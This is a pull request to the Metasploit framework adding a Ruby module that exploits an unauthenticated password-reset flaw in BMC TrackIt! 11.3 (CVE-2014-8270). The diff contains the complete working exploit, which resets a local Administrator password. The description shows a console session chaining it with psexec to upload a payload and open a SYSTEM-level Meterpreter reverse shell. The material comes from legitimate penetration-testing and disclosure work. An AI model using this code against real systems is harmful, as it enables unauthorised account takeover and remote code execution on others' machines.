### PR TITLE
Create bmc_trackit_passwd_reset.rb

### DIFF
--- a/modules/auxiliary/gather/bmc_trackit_passwd_reset.rb
+++ b/modules/auxiliary/gather/bmc_trackit_passwd_reset.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http//metasploit.com/download
+# This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

--- a/modules/auxiliary/gather/bmc_trackit_passwd_reset.rb
+++ b/modules/auxiliary/gather/bmc_trackit_passwd_reset.rb
@@ -90,7 +90,7 @@ class Metasploit4 < Msf::Auxiliary
     })
 
     if !res or res.body != '{"success":true,"data":{"PasswordResetStatus":0}}'
-      fail_with("Could not change the user's password. Is it a domain or local user?")
+      fail_with(Failure::Unknown, "Could not change the user's password. Is it a domain or local user?")
     end
 
     print_status("Please run the psexec module using:")

--- a/modules/auxiliary/gather/bmc_trackit_passwd_reset.rb
+++ b/modules/auxiliary/gather/bmc_trackit_passwd_reset.rb
@@ -1,0 +1,99 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'BMC TrackIt! Unauthenticated Arbitrary Local User Password Change',
+      'Description'    => %q{
+      This module exploits a flaw in the password reset mechanism in BMC TrackIt! 11.3
+      and possibly prior versions.
+      },
+      'References'     =>
+        [
+          ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-419/'],
+          ['CVE', '2014-8270']
+        ],
+      'Author'         =>
+        [
+          'bperry', #discovery/metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => "Dec 9 2014"
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'The path to BMC TrackIt!', '/']),
+        OptString.new('LOCALUSER', [true, 'The local user to change password for', 'Administrator']),
+        OptString.new('DOMAIN', [false, 'The domain of the user. By default the local user\'s computer name will be autodetected', ''])
+      ], self.class)
+  end
+
+  def run
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'PasswordReset'),
+    })
+
+    unless res
+      fail_with(Failure::Unknown, "Could not contact server")
+    end
+
+    cookie = res.headers['Set-Cookie']
+    domain = $1 if res.body =~ /"domainName":"(.*)"\}\);/
+    domain = datastore['DOMAIN'] if datastore['DOMAIN'] != ''
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'PasswordReset', 'Application', 'Register'),
+      'method' => 'POST',
+      'cookie' => cookie,
+      'vars_post' => {
+        'domainname' => domain,
+        'userName' => datastore['LOCALUSER'],
+        'emailaddress' => Rex::Text.rand_text_alpha(8) + '@' + Rex::Text.rand_text_alpha(8) + '.com',
+        'userQuestions' => '[{"Id":1,"Answer":"not"},{"Id":2,"Answer":"not"}]',
+        'updatequesChk' => 'false',
+        'SelectedQuestion' => 1,
+        'SelectedQuestion' => 2,
+        'answer' => 'not',
+        'answer' => 'not',
+        'confirmanswer' => 'not',
+        'confirmanswer' => 'not'
+      }
+    })
+
+    if !res or res.body != "{\"success\":true,\"data\":{\"userUpdated\":true}}"
+      fail_with("Could not register the user.")
+    end
+
+    password = Rex::Text.rand_text_alpha(10) + "!1"
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'PasswordReset', 'Application', 'ResetPassword'),
+      'method' => 'POST',
+      'cookie' => cookie,
+      'vars_post' => {
+        'newPassword' => password,
+        'domain' => domain,
+        'UserName' => datastore['LOCALUSER'],
+        'CkbResetpassword' => 'true'
+      }
+    })
+
+    if !res or res.body != '{"success":true,"data":{"PasswordResetStatus":0}}'
+      fail_with("Could not change the user's password. Is it a domain or local user?")
+    end
+
+    print_status("Please run the psexec module using:")
+    print_status("#{domain}\\#{datastore['LOCALUSER']}:#{password}")
+  end
+end

--- a/modules/auxiliary/gather/bmc_trackit_passwd_reset.rb
+++ b/modules/auxiliary/gather/bmc_trackit_passwd_reset.rb
@@ -72,7 +72,7 @@ class Metasploit4 < Msf::Auxiliary
     })
 
     if !res or res.body != "{\"success\":true,\"data\":{\"userUpdated\":true}}"
-      fail_with("Could not register the user.")
+      fail_with(Failure::Unknown, "Could not register the user.")
     end
 
     password = Rex::Text.rand_text_alpha(10) + "!1"


### PR DESCRIPTION
Hi,

This pull request adds an auxiliary module that exploits: http://www.zerodayinitiative.com/advisories/ZDI-14-419/

The vulnerability allows an unauthenticated user to change a local user's password, such as Administrator.

You may find a vulnerable installer here: http://volatileminds.net/Track-It!11.3.exe

Usage:

```
bperry@w00den-pickle:~/Projects/metasploit-framework$ ./msfconsole

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        http://metasploit.pro


       =[ metasploit v4.9.0-dev [core:4.9 api:1.0] ]
+ -- --=[ 1300 exploits - 718 auxiliary - 202 post ]
+ -- --=[ 331 payloads - 33 encoders - 8 nops      ]

msf > use auxiliary/gather/bmc_trackit_pwd_reset 
msf auxiliary(bmc_trackit_pwd_reset) > set RHOST 192.168.1.99
RHOST => 192.168.1.99
msf auxiliary(bmc_trackit_pwd_reset) > show options

Module options (auxiliary/gather/bmc_trackit_pwd_reset):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN                      no        The domain of the user. By default the local user's computer name will be autodetected
   LOCALUSER  Administrator    yes       The local user to change password for
   Proxies                     no        Use a proxy chain
   RHOST      192.168.1.99     yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The path to BMC TrackIt!
   VHOST                       no        HTTP server virtual host

msf auxiliary(bmc_trackit_pwd_reset) > run

[*] Please run the psexec module using:
[*] WIN-R85ELSBASBS\Administrator:DbWuekzzTc!1
[*] Auxiliary module execution completed
msf auxiliary(bmc_trackit_pwd_reset) > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.99
RHOST => 192.168.1.99
msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(psexec) > set SMBPass DbWuekzzTc!1
SMBPass => DbWuekzzTc!1
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.1.31:4444 
[*] Connecting to the server...
[*] Authenticating to 192.168.1.99:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \bmZETHWc.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.99[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.99[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (tYdAGjxe - "MqHgcLVuTuyQoSmZaDOE")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \bmZETHWc.exe...
[*] Sending stage (769024 bytes) to 192.168.1.99
[*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.99:49878) at 2014-12-10 18:57:36 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
